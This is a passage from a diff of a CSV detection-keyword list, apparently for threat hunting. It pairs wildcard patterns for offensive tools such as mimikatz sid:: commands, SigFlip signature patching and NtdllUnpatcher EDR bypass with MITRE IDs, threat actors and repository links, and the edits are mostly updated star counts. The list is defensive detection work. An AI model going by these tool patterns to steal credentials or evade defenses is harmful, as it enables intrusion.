tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sigflip*/Bof/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigFlip.exe -*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigFlip.WinTrustData*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigInject *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigInject *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigLoader *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*Sigloader *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigLoader.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigLoader/sigloader.c*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*signal2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*sid::add*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::lookup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::patch*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::query*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sigflip*/Bof/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.exe -*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.WinTrustData*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*Sigloader *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader/sigloader.c*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*signal2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Signal-Labs/NtdllUnpatcher*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 